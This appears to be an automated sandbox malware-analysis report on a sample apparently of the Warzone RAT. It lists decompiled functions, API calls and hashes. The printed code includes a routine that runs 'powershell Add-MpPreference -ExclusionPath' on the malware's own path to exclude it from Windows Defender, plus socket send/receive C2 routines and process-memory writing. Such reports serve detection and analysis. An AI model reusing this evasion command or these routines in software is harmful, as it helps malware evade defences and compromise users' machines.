                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$ProcessQueryValue$AllocateFree
                                  • String ID: ?VA
                                  • API String ID: 3459632794-1028452459
                                  • Opcode ID: 0f9460df5ca525744c9f118b6e5f6efa6d882a9783e30541dd17392b9dbe3837
                                  • Instruction ID: ef5b91e0520f3c1ad74f83bd351b8b7f17400620d7ac54be9350e6622f7c98ba
                                  • Opcode Fuzzy Hash: 0f9460df5ca525744c9f118b6e5f6efa6d882a9783e30541dd17392b9dbe3837
                                  • Instruction Fuzzy Hash: E7019E72900118BFEB15DFA1DD85DEF7BBDEF08354B10007AF901E2250EA749F959AA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00414F7E(void* __ecx, void* __eflags) {
                                  				CHAR* _t21;
                                  				CHAR* _t22;
                                  
                                  				_t22 = E00401085(0x100);
                                  				_t21 = E00401085(0x100);
                                  				E00401052(_t22, 0, 0x100);
                                  				E00401052(_t21, 0, 0x100);
                                  				GetModuleFileNameA(0, _t22, 0x100);
                                  				E0040102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E00401133("powershell Add-MpPreference -ExclusionPath "));
                                  				_t1 =  &(_t21[0x2b]); // 0x2b
                                  				E0040102C(_t1, _t22, 3);
                                  				_t2 =  &(_t22[0xff]); // 0xff
                                  				E0040102C(E00401133(_t21) + _t21, _t2, 1);
                                  				return WinExec(_t21, 0);
                                  			}

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,74A313FB,00000000,004156DE), ref: 00414FAF
                                  • WinExec.KERNEL32 ref: 00414FF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateExecFileModuleNameProcess
                                  • String ID: powershell Add-MpPreference -ExclusionPath
                                  • API String ID: 1183730998-2194938034
                                  • Opcode ID: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                  • Instruction ID: f9242cdbd1c9b696a892a29a9369df0dc44288307f8c57903ac4db52bc2fe90b
                                  • Opcode Fuzzy Hash: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                  • Instruction Fuzzy Hash: E7F062B154025476F22032725CCBFBF566CDF89758F04043BF684B55D2EA7C994141BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004056F5(void* __ecx, void* __edx, intOrPtr _a4) {
                                  				char _v12;
                                  				char _v16;
                                  				char _v24;
                                  				void* _t21;
                                  				void* _t38;
                                  				intOrPtr _t39;
                                  				void* _t40;
                                  
                                  				_t37 = __edx;
                                  				_t38 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
                                  					E00403115( &_v24, __edx, E004034D1( &_v12, "warzoneTURBO"));
                                  					_t31 = _v12;
                                  					E00405FEB(_v12);
                                  					_t39 = _a4;
                                  					_t32 = _t40;
                                  					E0040315E(_t40, _t39);
                                  					E0040315E(_t40,  &_v24);
                                  					_t7 =  &_v16; // 0x405062
                                  					_t21 = E004061F0(_t7, _t37, _t40, _t32, _v12, _t31);
                                  					_t9 =  &_v16; // 0x405062
                                  					_t10 = _t38 + 0xc; // 0x415e66
                                  					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0);
                                  					E00403148( &_v16);
                                  					E00403148( &_v24);
                                  					return 0 | _t21 != 0xffffffff;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • send.WS2_32(00415E66,bP@,?,00000000), ref: 00405758
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID: bP@$warzoneTURBO
                                  • API String ID: 2809346765-1210837753
                                  • Opcode ID: 760b336eb2069862a5e6fc8d6d50c3ccd8c24c0d1d3194bec67f328afdb6f1e2
                                  • Instruction ID: f3416621e5f2c5c02f3395680495e6a6f54d57ba278d3546227d2c899631d6b7
                                  • Opcode Fuzzy Hash: 760b336eb2069862a5e6fc8d6d50c3ccd8c24c0d1d3194bec67f328afdb6f1e2
                                  • Instruction Fuzzy Hash: 4A01C431900009BBCB04BFA6DC42CEEBB68DF14325B10423EF122761D1DB396B058A68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412612(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
                                  				long _t10;
                                  				short** _t22;
                                  				void** _t23;
                                  
                                  				_t23 = __ecx;
                                  				_t22 = _a8;
                                  				if(_a16 == 0 || E00410C50(_a4, _t22) != 0) {
                                  					L4:
                                  					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23);
                                  					if(_t10 != 0) {
                                  						goto L6;
                                  					}
                                  					return _t10 + 1;
                                  				} else {
                                  					_a16 = 0;
                                  					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
                                  						L6:
                                  						return 0;
                                  					}
                                  					E00412554(_t23);
                                  					goto L4;
                                  				}
                                  			}

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(74A313FB,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                    • Part of subcall function 00410C50: RegOpenKeyExW.ADVAPI32(74A313FB,00000000,00000000,00020019,00000000,74A313FB,?,0041262E,?,?,?VA,?,00412B64,80000001,?,000F003F), ref: 00410C66
                                  • RegCreateKeyExW.ADVAPI32(74A313FB,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open$CloseCreate
                                  • String ID: ?VA
                                  • API String ID: 1752019758-1028452459
                                  • Opcode ID: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                  • Instruction ID: 4932445430126be2ff0c3f65702f86cceb6eb04fd32848aa65fa8fc0dd82d40c
                                  • Opcode Fuzzy Hash: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                  • Instruction Fuzzy Hash: 5A01197120020EBFAB119F62DE84DFB7B6EEF44398B10402AF905D1250E7B5CDA19AB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0041068D(intOrPtr* _a4) {
                                  				intOrPtr* _t3;
                                  				void* _t4;
                                  				void* _t5;
                                  				intOrPtr _t7;
                                  				intOrPtr _t11;
                                  				void* _t15;
                                  
                                  				_t3 = _a4;
                                  				_t7 =  *_t3;
                                  				_t11 =  *((intOrPtr*)(_t3 + 8));
                                  				if( *0x426755 != 0) {
                                  					while(1) {
                                  						_t4 = E00401085(0x2000);
                                  						_t13 = _t4;
                                  						__imp__#16(_t11, _t4, 0x1f40, 0);
                                  						if(_t4 == 0xffffffff || _t4 == 0) {
                                  							break;
                                  						}
                                  						E004106F9(_t13, _t4, _t7);
                                  						_t5 = E00401099(_t13);
                                  						_t15 = _t15 + 0xc;
                                  						if( *0x426755 != 0) {
                                  							continue;
                                  						}
                                  						L7:
                                  						return _t5;
                                  					}
                                  					__imp__#3(_t11);
                                  					_t5 = E00401099(_t13);
                                  					goto L7;
                                  				}
                                  				return _t3;
                                  			}

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • recv.WS2_32(?,00000000,00001F40,00000000), ref: 004106BA
                                  • closesocket.WS2_32(?), ref: 004106E7
                                    • Part of subcall function 004106F9: send.WS2_32(?,00000000,00000002,00000000), ref: 0041074A
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateFreeclosesocketrecvsend
                                  • String ID: <5Ik
                                  • API String ID: 1908950363-1120072674
                                  • Opcode ID: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                  • Instruction ID: cf5c065e532922d4a3d76e571e2bf2fb24ffb7083d1690fd6d685bf59492f6b1
                                  • Opcode Fuzzy Hash: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                  • Instruction Fuzzy Hash: 85F09C716042442EE22063256C4AFFF379CCFC57ACF14016BFA04561E1DAF85CD282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketshutdown
                                  • String ID: <5Ik
                                  • API String ID: 572888783-1120072674
                                  • Opcode ID: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                  • Instruction ID: 284792fdbf7bd6b26f007be0ad5fa8b9be9590e38c7f66b8807de1f76de5a812
                                  • Opcode Fuzzy Hash: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                  • Instruction Fuzzy Hash: 6FD0C931018B109FD7311B14ED0EF92BBB1AB00332F10C65DE8BA444F0C7A06850DF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040ECE1(void** __ecx, void** __edx, void* __eflags) {
                                  				void** _v8;
                                  				intOrPtr _v12;
                                  				void* _v16;
                                  				intOrPtr _v20;
                                  				void* _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				intOrPtr _v40;
                                  				char _v100;
                                  				void* _t35;
                                  				void* _t38;
                                  				void* _t62;
                                  
                                  				_v8 = __edx;
                                  				_t62 = 0;
                                  				_v16 =  &_v100;
                                  				_v24 = 0;
                                  				_v12 = 0x426970;
                                  				_v20 = 0x426970;
                                  				_v28 =  *((intOrPtr*)(__ecx + 4));
                                  				if(E0040EE24( &_v16, __ecx, 0x40) != 0 && _v100 == 0x5a4d) {
                                  					_v32 =  *((intOrPtr*)(__ecx)) + _v40;
                                  					_t35 = LocalAlloc(0x40, 0x18);
                                  					_v16 = _t35;
                                  					if(_t35 != 0) {
                                  						E0040EE24( &_v16,  &_v32, 0x18);
                                  						_t44 =  ==  ? 0xf8 : 0x108;
                                  						_t38 = LocalAlloc(0x40,  ==  ? 0xf8 : 0x108);
                                  						_v24 = _t38;
                                  						if(_t38 != 0) {
                                  							_t62 = E0040EE24( &_v24,  &_v32, _t44);
                                  							if(_t62 == 0) {
                                  								LocalFree(_v24);
                                  							} else {
                                  								 *_v8 = _v24;
                                  							}
                                  						}
                                  						LocalFree(_v16);
                                  					}
                                  				}
                                  				return _t62;
                                  			}

                                  APIs
                                    • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                    • Part of subcall function 0040EE24: WriteFile.KERNEL32(?,`@,00426970,00000150,00000000), ref: 0040EE92
                                  • LocalAlloc.KERNEL32(00000040,00000018,00000001,?,0040EAD8), ref: 0040ED3D
                                    • Part of subcall function 0040EE24: WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                    • Part of subcall function 0040EE24: LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                    • Part of subcall function 0040EE24: LocalFree.KERNEL32(?), ref: 0040EEF6
                                  • LocalAlloc.KERNEL32(00000040,00000108), ref: 0040ED6C
                                  • LocalFree.KERNEL32(00000000), ref: 0040EDA0
                                    • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                    • Part of subcall function 0040EE24: ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                    • Part of subcall function 0040EE24: ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                  • LocalFree.KERNEL32(?), ref: 0040ED9B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Local$File$AllocFree$MemoryPointerProcessReadWrite
                                  • String ID:
                                  • API String ID: 2785045919-0
                                  • Opcode ID: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                  • Instruction ID: 844012893b931533083f36e29c55c77bc0a60c617dbdfc6ad0899e7f9f39f4eb
                                  • Opcode Fuzzy Hash: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                  • Instruction Fuzzy Hash: 32213B71E0020E9BCB10DFAAC9419DEF7B5EF84700F15846BE500BB290EB78AE01CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6cdb3c2b49929048136401609cbf9934a57b6a659b250b22e81660ffd5685234
                                  • Instruction ID: 179cc55288daab9516b34f6e1dc1ce7fb8914e5025fd4306648d44c3b987cc2d
                                  • Opcode Fuzzy Hash: 6cdb3c2b49929048136401609cbf9934a57b6a659b250b22e81660ffd5685234
                                  • Instruction Fuzzy Hash: AA13B474A11618CFC765DF34C894BA9B7B6FF8A301F2092E9E5096B260DB316E84CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99b58c1a1bd888ba3f902bb000504a6cacffb28b41f1e01dfcec7d34a6794926
                                  • Instruction ID: 324b24a101f5af88d0a2fe44ea11a1f9e503c4f28933cae6e345822314e52929
                                  • Opcode Fuzzy Hash: 99b58c1a1bd888ba3f902bb000504a6cacffb28b41f1e01dfcec7d34a6794926
                                  • Instruction Fuzzy Hash: F913B574A11618CFC765DF34C894BA9B7B6FF8A301F2092E9E5096B260DB316E84CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b.
                                  • API String ID: 0-890368386
                                  • Opcode ID: d0d5461627b6494dd10350cb6b5a12f352f06765851346a413df11755793b23d
                                  • Instruction ID: fc8c01935047d11cf3cafc9340f6a7e0bd108a4df1dddf30456a59f6a45a4fc9
                                  • Opcode Fuzzy Hash: d0d5461627b6494dd10350cb6b5a12f352f06765851346a413df11755793b23d
                                  • Instruction Fuzzy Hash: 4C912770D04219DFCB05DFE5D5818AEBBF5FF8A301F20992AD806BB224E7309A45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ac58ad391dad82a2a9b0f7f8b2f313611bb5836c5ad9644a3c7ca146ec2c4ded
                                  • Instruction ID: 15659a09bbf0a8ffe11a15655d422d4041d518c6293a8c953ed335158d8314b6
                                  • Opcode Fuzzy Hash: ac58ad391dad82a2a9b0f7f8b2f313611bb5836c5ad9644a3c7ca146ec2c4ded
                                  • Instruction Fuzzy Hash: D3C14C7490520ADFCB05CFA4C5848BEFBB5FF89311B249555C816BB624CB34AA86CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46accf5907867ef5d32850b5482cb926ebb746713a6939b494c01d6672f37eaf
                                  • Instruction ID: 6fc681e5f0cdc32668f438b9bd9551d0d6867085b6783e6d54ef1ff2ba487027
                                  • Opcode Fuzzy Hash: 46accf5907867ef5d32850b5482cb926ebb746713a6939b494c01d6672f37eaf
                                  • Instruction Fuzzy Hash: 469152B0D152099FCB04DFEAC5809AEFBF2BF89315F20D129E815AB264D7349A45DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3099234215d7ea1d34d9602728ca6cc5e71608eaed024341af911a438a75005e
                                  • Instruction ID: 9abfbd9ab5950337d286669b2f3775105288fd1ef50580c3fa71d2b1de391931
                                  • Opcode Fuzzy Hash: 3099234215d7ea1d34d9602728ca6cc5e71608eaed024341af911a438a75005e
                                  • Instruction Fuzzy Hash: 179152B0D152099FCB04DFEAC5809AEBBF2BF89315F24D12AD815EB264D7349A45CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bc266bc6488e40b63c57e05dace8e1681daf3fc69197bb8532dfba88acf16e3
                                  • Instruction ID: fba24fcc89b8edd6986e71696deec346ceae601f27065a7e9a8c6e8de981eac1
                                  • Opcode Fuzzy Hash: 9bc266bc6488e40b63c57e05dace8e1681daf3fc69197bb8532dfba88acf16e3
                                  • Instruction Fuzzy Hash: 29713770D015088FCB04DFEAD5849ADFBF2BF98321F24C125E864AB3A5D734AA45CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1422d4d00b101ddfa48764fb8a4fd5b0dfbc49934b9cf62e00f85727e3f8c2b
                                  • Instruction ID: b3821226ddc233afa19f6dfa036cee89e58a6039134395eb8a771700336b10d6
                                  • Opcode Fuzzy Hash: e1422d4d00b101ddfa48764fb8a4fd5b0dfbc49934b9cf62e00f85727e3f8c2b
                                  • Instruction Fuzzy Hash: B371D274E11219DFCB08CFE5C941AAEBBB2FF89301F20952AD805BB264DB345A45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0e2298629b92c37c705d20bfc471f23c35f2a37be550cfe7df6b3783e86b4fa
                                  • Instruction ID: bf6aa61cfc94e732f67aa1140e30c84b9e7d53e5d53d9263187d758c123231b3
                                  • Opcode Fuzzy Hash: c0e2298629b92c37c705d20bfc471f23c35f2a37be550cfe7df6b3783e86b4fa
                                  • Instruction Fuzzy Hash: 3B519A70D05609DFCB01CFA5C980AAEFBB2FF8A311F24C56AD451B7265D3389A04CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54642f8114a5dfb1cc7ebb1f10d36c370894aa17830034090a73fbe595eb2866
                                  • Instruction ID: 82f630e94df9d571324f901031349a0b3acbd9ccde2539c635d077b06a67e2f5
                                  • Opcode Fuzzy Hash: 54642f8114a5dfb1cc7ebb1f10d36c370894aa17830034090a73fbe595eb2866
                                  • Instruction Fuzzy Hash: 63518970D01609DFDB01CFA5C980AAEFBB2FF89311F20C569D811B7264D3389A04CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 562a7c72988cb63357b1a0f07312ef4c4b7cc375b32890ae543d660e999327af
                                  • Instruction ID: 70366e011f4a956ed5de17b48ca23304df7ad4d3e4e29aa2ab8d4ada32923feb
                                  • Opcode Fuzzy Hash: 562a7c72988cb63357b1a0f07312ef4c4b7cc375b32890ae543d660e999327af
                                  • Instruction Fuzzy Hash: 9A513670D092098FCB09CFE5E5819AEFBF2EF89301F25956AD815A7220D3348A45CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dab4962570c22d14a2ac8e9d2f0888293da904217c08562fccfd7008d43523e7
                                  • Instruction ID: 9d1484cf8fea7ca0b40480c2180882e83de1d0c0602ee55ecbb814f9dc342b8f
                                  • Opcode Fuzzy Hash: dab4962570c22d14a2ac8e9d2f0888293da904217c08562fccfd7008d43523e7
                                  • Instruction Fuzzy Hash: 89515970D015089FDB04DFEAD98099DFBF2BF98321F24C169E854AB3A5D734AA05CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f215e41c32599b179118194520516e28ddb48abe695e519a2a3ad04cde62bad
                                  • Instruction ID: 444e95bae2864aaed5c8812403b0fe8e6d9c963da9cf61068af4fe76090cf74e
                                  • Opcode Fuzzy Hash: 3f215e41c32599b179118194520516e28ddb48abe695e519a2a3ad04cde62bad
                                  • Instruction Fuzzy Hash: 9551F4B590E285DFDB02DFB4E9A484DFFF0AF56301B4684EBD8409B2A2D7309909DB01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c148c470ecc44e5399c2da0d012170a4698a0a38a0137cdcddadbe87b8dfba2f
                                  • Instruction ID: d6399fab66d8204084f31c74e0493b1ab5411bebf9a5db75d8c66e8adfa637d7
                                  • Opcode Fuzzy Hash: c148c470ecc44e5399c2da0d012170a4698a0a38a0137cdcddadbe87b8dfba2f
                                  • Instruction Fuzzy Hash: 9131F871E046588BDB19CFA6D8447DEFBF2AFC9301F14C1AAD809AB264DB740A45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fe01bbb4133890e03617aa0234b9f4af20da19108385c133c0c05b969ff5f32
                                  • Instruction ID: 1822e8326bd16d7a22b90559a06d1f4fe6b6f61ed6fc59f6683c435fabdd9fa5
                                  • Opcode Fuzzy Hash: 2fe01bbb4133890e03617aa0234b9f4af20da19108385c133c0c05b969ff5f32
                                  • Instruction Fuzzy Hash: F2316BB4D192899FCB06CFA9D8945AEFFB2FF59204F2484ABC841E72A1D6344A05CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: :@lq
                                  • API String ID: 0-537014040
                                  • Opcode ID: 9efff3eee96e7b2ae7b97700488dcebabdc307b33d9f88f2cf4fdd34c0a87681
                                  • Instruction ID: ebc78018d1bda6b8c6edfea5425b93aba09f36f473d963ef5d0a29196866c4a1
                                  • Opcode Fuzzy Hash: 9efff3eee96e7b2ae7b97700488dcebabdc307b33d9f88f2cf4fdd34c0a87681
                                  • Instruction Fuzzy Hash: D291E274E01219CFDB18DFA9C994B9DBBF1BF89314F204069E809AB361DB31A985CF11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34950d5afd8403556afadb2aed816ae0cf51ade51c4c3223b2aa8382f7f04a05
                                  • Instruction ID: 613acd2990be07aeb87eee3b2603d3a84b950abcfe72cf4639948224415ee132
                                  • Opcode Fuzzy Hash: 34950d5afd8403556afadb2aed816ae0cf51ade51c4c3223b2aa8382f7f04a05
                                  • Instruction Fuzzy Hash: E0919574E0020A8BDB04DBA4D981ACDB7F2FF89304F608669E505BB759DB71AD46CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05d685158e1fa15a29c3d71812f96e74b6b7cc5d82af8684aee8d75ca0841e8f
                                  • Instruction ID: 73e3b5734d0a4cce33145d8a4f43dfb536f0687a4cbc04400f88d7168c75a7d9
                                  • Opcode Fuzzy Hash: 05d685158e1fa15a29c3d71812f96e74b6b7cc5d82af8684aee8d75ca0841e8f
                                  • Instruction Fuzzy Hash: 69419B78A00208DFDB05CFA8C984BADBBF1AF4E314F1054A5E902BB360D739A944DF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7148818fbd70a9ebcad051dc5cb5fe75f32e3830c5cccf21637476651cb39b00
                                  • Instruction ID: a87482e9204a26cede4bf0a4446aa6d36923cf679728dbf558d2cb447db034ae
                                  • Opcode Fuzzy Hash: 7148818fbd70a9ebcad051dc5cb5fe75f32e3830c5cccf21637476651cb39b00
                                  • Instruction Fuzzy Hash: 173107B4D04208EFCB09DFA5D950AEDBBB2BF49305F258069D805BB261C7355D85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4d0b011292ddaa21396c66544f304f57c6c66442a7b53aa92d4af7ccb2125642
                                  • Instruction ID: 489cb2c1ccb0c6baf8fd37ec73c523780938afb363958803c26fffd98454aafd
                                  • Opcode Fuzzy Hash: 4d0b011292ddaa21396c66544f304f57c6c66442a7b53aa92d4af7ccb2125642
                                  • Instruction Fuzzy Hash: E1315C74A06209EFDB40EFA4DA84A5DFBF1FF95311F5184A9D809AB224D730AE48DF44
                                  Uniqueness

